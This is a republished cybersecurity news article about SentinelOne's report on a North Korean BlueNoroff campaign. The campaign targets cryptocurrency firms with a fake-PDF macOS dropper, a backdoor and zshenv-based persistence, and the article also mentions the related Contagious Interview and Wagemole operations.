Contact Info

Atlas Cloud LLC 600 Cleveland Street Suite 348 Clearwater, FL 33755 USA

support@dedirock.com

Client Area
Recommended Services
Supported Scripts
WordPress
Hubspot
Joomla
Drupal
Wix
Shopify
Magento
Typeo3

A threat actor associated with the Democratic People’s Republic of Korea (DPRK) has been detected targeting businesses related to cryptocurrency with a multi-stage malware designed to infect Apple macOS devices.

Cybersecurity firm SentinelOne, which labeled the initiative Hidden Risk, strongly associates it with BlueNoroff, a group already linked to various malware families including RustBucket, KANDYKORN, ObjCShellz, RustDoor (also known as Thiefbucket), and TodoSwift.

This activity involves using emails that promote fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file, noted researchers Raffaele Sabato, Phil Stokes, and Tom Hegel in a report shared with The Hacker News.

According to the report, the campaign likely started as early as July 2024, employing email and PDF lures featuring fictitious news headlines or stories on crypto-related subjects.

As reported by the U.S. Federal Bureau of Investigation (FBI) in a September 2024 advisory, these campaigns represent “highly tailored, difficult-to-detect social engineering” attacks targeting employees within the decentralized finance (DeFi) and cryptocurrency sectors.

The attacks appear as fake job offers or corporate investment opportunities, where the threat actors engage with their targets for extended periods to build trust before deploying malware.

SentinelOne reported observing a phishing attempt on a cryptocurrency-related entity in late October 2024. This incident involved the delivery of a dropper application posing as a PDF file titled “Hidden Risk Behind New Surge of Bitcoin Price.app,” hosted on delphidigital[.]org.

Crafted using the Swift programming language, this application was signed and notarized on October 19, 2024, under the Apple developer ID “Avantis Regtech Private Limited (2S8XHJ7948),” but the signature has since been revoked by Apple.

When launched, the application presents the victim with a fake PDF file fetched from Google Drive, while covertly retrieving and executing a second-stage executable from a remote server. This executable acts as a backdoor, enabling remote command execution.

Furthermore, the backdoor employs an innovative persistence method that exploits the zshenv configuration file, marking the first observed instance of this technique in active malware.

This technique proves particularly effective on modern macOS versions, especially after the introduction of user notifications for background Login Items in macOS 13 Ventura, as it circumvents notifications intended to alert users when other persistent methods, like LaunchAgents and LaunchDaemons, are employed.

The threat actor has been observed utilizing domain registrar Namecheap to set up infrastructure themed around cryptocurrency, Web3, and investments, lending a facade of legitimacy to their activities. Hosting services such as Quickpacket, Routerhosting, and Hostwinds are among their preferred choices.

Notably, the attack chain bears similarities to a prior campaign highlighted by Kandji in August 2024, which also utilized a similarly titled macOS dropper app to deploy TodoSwift.

It’s unclear what led to the change in tactics by the threat actors, though it may relate to public reports concerning their activities. “North Korean actors have exhibited resourcefulness and adaptability, making it feasible that we are witnessing the emergence of new successful methods from their offensive cyber strategies,” remarked Stokes to The Hacker News.

Another alarming aspect of this campaign is BlueNoroff’s capability to acquire or hijack legitimate Apple developer accounts, facilitating the notarization of their malware by Apple.

In recent months, North Korean cyber actors have reportedly conducted campaigns against the cryptocurrency industry, involving significant ‘grooming’ efforts of targets through social media channels.

In contrast, the Hidden Risk campaign adopts a more traditional email phishing approach, though it remains effective despite its lack of subtlety. Evidence of prior DPRK-backed strategies is still observable.

The evolving landscape also includes other operations by North Korean hackers seeking employment opportunities in Western companies, delivering malware through compromised codebases and virtual meeting tools disguised as hiring challenges or assignments.

Two intrusion sets, known as Wagemole (aka UNC5267) and Contagious Interview, have been ascribed to a threat group identified as Famous Chollima (aka CL-STA-0240 and Tenacious Pungsan).

ESET has categorized Contagious Interview as a new active cluster within the Lazarus Group, primarily targeting freelance developers globally to facilitate cryptocurrency theft.

“The Contagious Interview and Wagemole initiatives demonstrate the evolving methods employed by North Korean threat actors in their relentless pursuit of data theft and remote job placements in Western nations, aiming to circumvent financial sanctions,” stated Zscaler ThreatLabz researcher Seongsu Park recently.

“Thanks to advanced obfuscation techniques, cross-platform compatibility, and rampant data theft, these operations increasingly threaten businesses and individuals alike.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.

Share this Post
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x